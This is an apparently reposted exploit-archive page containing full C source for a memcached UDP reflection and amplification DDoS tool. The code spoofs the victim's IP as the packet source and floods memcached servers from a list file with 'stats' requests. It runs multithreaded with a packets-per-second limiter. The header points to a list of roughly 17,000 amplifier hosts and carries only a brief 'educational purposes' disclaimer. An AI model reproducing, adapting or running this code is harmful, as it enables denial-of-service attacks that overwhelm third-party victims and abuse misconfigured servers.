首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
memcached Proof of Concept Amplification via spoofed source UDP packets
来源:https://pastebin.com/u/responsibled 作者:Responsibled 发布时间:2018-03-09  

/**
memcached-PoC

memcached Proof of Concept Amplification via spoofed source UDP packets. Repo includes source code for PoC and approximately 17,000 AMP hosts.

memcached.c - Source code (https://pastebin.com/raw/ZiUeinae)
memecache-amp-03-05-2018-rd.list - List of memcached servers as of 03-05-2018 (https://pastebin.com/raw/eSCHTTVu)

Compile: gcc memcached.c -o memecached -pthread

*Educational and/or testing purposes only. *Use of these tools against an unauthorized party may be unethtical, rude, and even illegal in some countries.

**/

/*
   memcache reflection script
   greeting: syn, storm, krashed, chrono, spike, niko, disliked
   Use with extreme Caution
*/

#include <time.h>
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 8192
#define PHI 0x9e3779b9
static uint32_t Q[4096], c = 362436;
struct list
{
 struct sockaddr_in data;
 struct list *next;
 struct list *prev;
};
struct list *head;
volatile int tehport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
void init_rand(uint32_t x)
{
 int i;
 Q[0] = x;
 Q[1] = x + PHI;
 Q[2] = x + PHI + PHI;
 for (i = 3; i < 4096; i++)
 {
 Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
 }
}
uint32_t rand_cmwc(void)
{
 uint64_t t, a = 18782LL;
 static uint32_t i = 4095;
 uint32_t x, r = 0xfffffffe;
 i = (i + 1) & 4095;
 t = a * Q[i] + c;
 c = (t >> 32);
 x = t + c;
 if (x < c) {
 x++;
 c++;
 }
 return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int nwords)
{
 unsigned long sum = 0;
 for (sum = 0; nwords > 0; nwords--)
 sum += *buf++;
 sum = (sum >> 16) + (sum & 0xffff);
 sum += (sum >> 16);
 return (unsigned short)(~sum);
}
void setup_ip_header(struct iphdr *iph)
{
 iph->ihl = 5;
 iph->version = 4;
 iph->tos = 0;
 iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 15;
 iph->id = htonl(54321);
 iph->frag_off = 0;
 iph->ttl = MAXTTL;
 iph->protocol = IPPROTO_UDP;
 iph->check = 0;
 iph->saddr = inet_addr("192.168.3.100");
}
void setup_udp_header(struct udphdr *udph)
{
 udph->source = htons(5678);
 udph->dest = htons(11211);
 udph->check = 0;
 memcpy((void *)udph + sizeof(struct udphdr), "\x00\x01\x00\x00\x00\x01\x00\x00stats\r\n", 15);
 udph->len=htons(sizeof(struct udphdr) + 15);
}
void *flood(void *par1)
{
 struct thread_data *td = (struct thread_data *)par1;
 char datagram[MAX_PACKET_SIZE];
 struct iphdr *iph = (struct iphdr *)datagram;
 struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
 struct sockaddr_in sin = td->sin;
 struct  list *list_node = td->list_node;
 int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
 if(s < 0){
 fprintf(stderr, "Could not open raw socket.\n");
 exit(-1);
 }
 init_rand(time(NULL));
 memset(datagram, 0, MAX_PACKET_SIZE);
 setup_ip_header(iph);
 setup_udp_header(udph);
 udph->source = htons(rand() % 65535 - 1026);
 iph->saddr = sin.sin_addr.s_addr;
 iph->daddr = list_node->data.sin_addr.s_addr;
 iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
 int tmp = 1;
 const int *val = &tmp;
 if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
 fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
 exit(-1);
 }
 init_rand(time(NULL));
 register unsigned int i;
 i = 0;
 while(1){
  sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
  list_node = list_node->next;
  iph->daddr = list_node->data.sin_addr.s_addr;
  iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
  iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
  
  pps++;
  if(i >= limiter)
  {
   i = 0;
   usleep(sleeptime);
  }
  i++;
 }
}
int main(int argc, char *argv[ ])
{
 if(argc < 6){
 fprintf(stderr, "Invalid parameters!\n");
 fprintf(stdout, "Usage: %s <target IP> <port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
  exit(-1);
 }
 srand(time(NULL));
 int i = 0;
 head = NULL;
 fprintf(stdout, "Setting up sockets...\n");
 int max_len = 128;
 char *buffer = (char *) malloc(max_len);
 buffer = memset(buffer, 0x00, max_len);
 int num_threads = atoi(argv[4]);
 int maxpps = atoi(argv[5]);
 limiter = 0;
 pps = 0;
 int multiplier = 20;
 FILE *list_fd = fopen(argv[3],  "r");
 while (fgets(buffer, max_len, list_fd) != NULL) {
  if ((buffer[strlen(buffer) - 1] == '\n') ||
    (buffer[strlen(buffer) - 1] == '\r')) {
   buffer[strlen(buffer) - 1] = 0x00;
   if(head == NULL)
   {
    head = (struct list *)malloc(sizeof(struct list));
    bzero(&head->data, sizeof(head->data));
    head->data.sin_addr.s_addr=inet_addr(buffer);
    head->next = head;
    head->prev = head;
   } else {
    struct list *new_node = (struct list *)malloc(sizeof(struct list));
    memset(new_node, 0x00, sizeof(struct list));
    new_node->data.sin_addr.s_addr=inet_addr(buffer);
    new_node->prev = head;
    new_node->next = head->next;
    head->next = new_node;
   }
   i++;
  } else {
   continue;
  }
 }
 struct list *current = head->next;
 pthread_t thread[num_threads];
 struct sockaddr_in sin;
 sin.sin_family = AF_INET;
 sin.sin_addr.s_addr = inet_addr(argv[1]);
 struct thread_data td[num_threads];
 for(i = 0;i<num_threads;i++){
  td[i].thread_id = i;
  td[i].sin= sin;
  td[i].list_node = current;
  pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
 }
 fprintf(stdout, "Starting flood...\n");
 for(i = 0;i<(atoi(argv[6])*multiplier);i++)
 {
  usleep((1000/multiplier)*1000);
  if((pps*multiplier) > maxpps)
  {
   if(1 > limiter)
   {
    sleeptime+=100;
   } else {
    limiter--;
   }
  } else {
   limiter++;
   if(sleeptime > 25)
   {
    sleeptime-=25;
   } else {
    sleeptime = 0;
   }
  }
  pps = 0;
 }
 return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WebLog Expert Web Server Enter
·Memcached 1.5.5 - 'Memcrashed
·WebLog Expert Web Server Enter
·Sony Playstation 4 (PS4) 4.55
·Eclipse Equinoxe OSGi Console
·ManageEngine Applications Mana
·CloudMe Sync 1.9.2 Remote Buff
·DEWESoft X3 SP1 (64-bit) - Rem
·Chrome V8 JIT JSBuiltinReducer
·Advantech WebAccess < 8.3 - Di
·Chrome V8 Out-Of-Bounds Read
·SC 7.16 - Stack-Based Buffer O
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved